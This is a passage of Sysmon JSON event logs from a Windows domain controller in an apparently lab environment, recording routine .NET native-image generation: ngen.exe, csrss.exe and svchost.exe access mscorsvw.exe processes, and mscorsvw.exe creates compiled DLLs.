0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.023","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010215C0B00}","TargetProcessId":"4464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6964,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.023\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010215C0B00}\r\nTargetProcessId: 4464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.023","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010215C0B00}","TargetProcessId":"4464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6965,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:05.038\r\nProcessGuid: {41C8662E-2231-5F25-0000-0010215C0B00}\r\nProcessId: 4464\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1170-0\\TRLParserCOMInterface.dll\r\nCreationUtcTime: 2020-08-01 08:05:05.038","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:05.038","ProcessGuid":"{41C8662E-2231-5F25-0000-0010215C0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1170-0\\TRLParserCOMInterface.dll","CreationUtcTime":"2020-08-01 08:05:05.038","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6966,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.054\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010545F0B00}\r\nTargetProcessId: 2268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.054","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010545F0B00}","TargetProcessId":"2268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6967,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.054\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010545F0B00}\r\nTargetProcessId: 2268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.054","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010545F0B00}","TargetProcessId":"2268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6968,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010545F0B00}\r\nTargetProcessId: 2268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010545F0B00}","TargetProcessId":"2268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6969,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.085\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010B8620B00}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.085","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010B8620B00}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6970,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.085\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010B8620B00}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.085","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010B8620B00}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6971,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.101\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010B8620B00}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.101","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010B8620B00}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6972,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:05.117\r\nProcessGuid: {41C8662E-2231-5F25-0000-0010B8620B00}\r\nProcessId: 3472\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d90-0\\Microsoft.ActiveDirectory.TRLParserInterop.dll\r\nCreationUtcTime: 2020-08-01 08:05:05.117","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:05.117","ProcessGuid":"{41C8662E-2231-5F25-0000-0010B8620B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d90-0\\Microsoft.ActiveDirectory.TRLParserInterop.dll","CreationUtcTime":"2020-08-01 08:05:05.117","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
